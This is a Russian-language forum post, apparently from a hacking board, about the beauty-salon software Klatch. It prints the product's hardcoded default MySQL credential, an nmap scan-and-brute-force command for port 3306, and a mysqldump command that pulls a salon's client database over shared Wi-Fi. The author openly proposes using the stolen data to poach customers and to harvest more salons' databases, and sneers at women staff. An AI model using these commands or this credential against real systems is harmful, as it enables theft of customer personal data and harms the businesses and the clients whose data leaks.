Уводим клиентскую базу с «Клатч»

Discussion in 'Этичный хакинг или пентестинг' started by winstrool, 30 Nov 2017.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    Как то по опыту работы пришлось столкнуться с программой «Клатч», которую использую, как систему управления предприятиями индустрии красоты, подробней с программой и как таковой системой, вы можете ознакомиться на официальном сайте данного пациента
    https://evolution-it.ru

    [​IMG]

    В рамках изучения функционала, для более плотного понимания программы была скачена демо версия и развернута локально на компе, в месте с программой также ставится локально MySql сервер, где в принципе и хранятся данные, логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем, вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini и вот пример его записи:

    Code:
    [connection]
    host=127.0.0.1
    user=metaUser
    pswd=d3578efe-8825-432c-bf72-cd1d0a65de30
    db=klatch_demo
    
    это конечно все интересно и занимательно, НО! Мне также довелось пощупать и лицензионную версию в действующем салоне красоты, и там точно такой же конфиг всего лишь с разницей в название BD:
    Code:
    db=klatch
    т.е. как следствие логин пасс к бд идет по умолчанию! Мы все прекрасно знаем, как часто люди редактируют дефолтные настройки, да ещё и к тому-же , женская аудитория, у которой мозг забит «красотой» или сисадмин который получает копейки в подобных местах.

    Сейчас очень популярно стало в публичных местах, салоны красоты не исключение, ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками.
    Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем….

    Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig”

    [​IMG]

    Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс:

    nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24

    [​IMG]

    Запросом «mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql» дампим к себе Бд где и есть заветная клиентская база данных клиентов.

    Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу.

    Это еще не всё! Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история.

    [​IMG]

    P.S: Зеркало статьи
     
    _________________________
    BenderMR, Gorev, uzeerpc and 6 others like this.